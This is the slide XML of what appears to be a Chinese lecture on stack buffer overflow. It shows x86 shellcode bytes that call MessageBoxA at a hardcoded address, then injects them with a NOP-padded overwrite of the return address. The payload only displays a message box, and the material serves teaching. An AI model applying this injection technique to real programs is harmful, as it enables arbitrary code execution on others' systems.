                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\n</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ProcAdd);</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getchar</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1791965"/>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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>C/C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语言中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数检索指定的动态链接库（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="e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中的输出库函数地址。如果函数调用成功，返回值是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中的输出函数地址。</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387798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第一步：获得函数入口地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B31798-06F2-7A0D-FED9-CFB2FE8663EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1361787" y="4159229"/>
            <a:ext cx="3911600" cy="1498600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59119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B9BD839E-994F-65BB-43A4-9C50C894B7C4}"/>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6AE0DB59-2CDF-ADA5-CD9C-5D90B5E50B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1122171"/>
            <a:ext cx="3258393" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MessageBox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数定义</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{293E90C5-84A1-8464-FAA6-7A5A9C11A00C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384031" y="1706792"/>
            <a:ext cx="5041203" cy="1569660"/>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MessageBox</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267F99"/>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HWND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hWnd</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zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>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LPCTSTR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lpText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267F99"/>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LPCTSTR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lpCaption</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267F99"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>UINT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uType</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2484463"/>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有了入口地址，就可以编写进行函数调用的汇编代码。</a:t>
            </a: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首先把字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>westwest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压入栈区，消息框的文本和标题都显示为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>westwest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，只要重复压入指向这个字符串的指针即可；第</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个和第</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个参数这里都将设置为</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NULL</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49353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第二步：编写函数调用汇编代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18458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3176960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>有了入口地址，就可以编写进行函数调用的汇编代码。</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首先把字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>westwest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压入栈区，消息框的文本和标题都显示为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>westwest</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，只要重复压入指向这个字符串的指针即可；第</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1</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个和第</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4</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个参数这里都将设置为</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NULL</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得到的</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33 </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DB 53 68 77 65 73 74 68 77 65 73 74 8B C4 53 50 50 53 B8 EA 07 45 7E FF D0</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49353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第二步：编写函数调用汇编代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BBFBF49-B878-99CF-F5E3-440CA5EA3F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1206085767"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6018655" y="1077820"/>
          <a:ext cx="5794763" cy="3405238"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="140227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592289">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">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机器</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>码</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汇编指令</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注释</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33 DB</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altLang="zh-CN" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>xor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>ebx</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>ebx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>的值设置为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>0</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53</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>ebx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>的值入栈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68 77 65 73 74</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74736577</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Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>将字符串</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>west</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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68 77 65 73 74</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74736577</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Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>将字符串</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>west</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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8B C4</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mov  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>eax,esp</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将栈顶指针存入</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>（栈顶指针的值就是字符串的首地址）</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53</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类型</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50</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标题</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50</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消息</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53</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句柄</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B8 EA 07 45 7E</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mov </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>, 7e4507ea</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00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调用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>MessageBoxA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1400" kern="100" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>函数，每个机器的该函数的入口地址不同，请按实际值写入</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="75298" marR="75298" marT="37649" marB="376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FF D0</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call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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10DB7ADE-A7B5-49A1-9DC5-38A3F2F47002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6960236" y="4653136"/>
            <a:ext cx="3911600" cy="1498600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97262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B9BD839E-994F-65BB-43A4-9C50C894B7C4}"/>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6AE0DB59-2CDF-ADA5-CD9C-5D90B5E50B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1122171"/>
            <a:ext cx="2533322"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verify</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数调用栈</a:t>
            </a:r>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1099468"/>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将这段</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写入</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文件，且在返回地址处写</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buffer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的地址。不足的部分用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Nop</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指令填充。</a:t>
            </a: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3556230"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第三步：注入</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495A4CED-3117-B7FA-C0DB-2F64FF2F9408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="852464" y="2885813"/>
            <a:ext cx="4927600" cy="1130300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59CF6D9D-5DFE-1D2C-BCC1-03991BF311FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="1989454"/>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8DDFD5DE-5CE0-EE18-E94A-47D577C219DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022617" y="2008830"/>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2" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB9483B3-12DE-69F9-6497-990F2B6D1ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7026098" y="554099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13" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6628CA2-5A98-35E1-20A6-65E9E3F80351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="273343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B2B72B0-3AE8-0952-6D85-CAE801F7F5A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051485" y="2363949"/>
            <a:ext cx="1428888" cy="375428"/>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00 12 FA F0</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">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78E7F068-10F1-DD8C-9B20-B7F52630CFE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="2746921"/>
            <a:ext cx="1428891" cy="345791"/>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8" name="直线连接符 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50186D18-3788-B286-9D39-BAECAEF6CB52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040214" y="310133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565B153-5129-E7F7-5ED2-840A6D1CE639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051485" y="3112407"/>
            <a:ext cx="1428888" cy="349796"/>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1" name="直线连接符 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC733C5A-E430-C37B-1285-487368703602}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="346220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8C67987-D310-B80F-F1E2-B1BF8F68BE15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="3476763"/>
            <a:ext cx="1428889" cy="378573"/>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3" name="直线连接符 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCFCB9D4-1A74-24A1-77FC-4C467B77CE7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="38553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F554022-80C5-2064-16D7-4167799EEAD5}"/>
              </a:ext>
            </a:extLst>
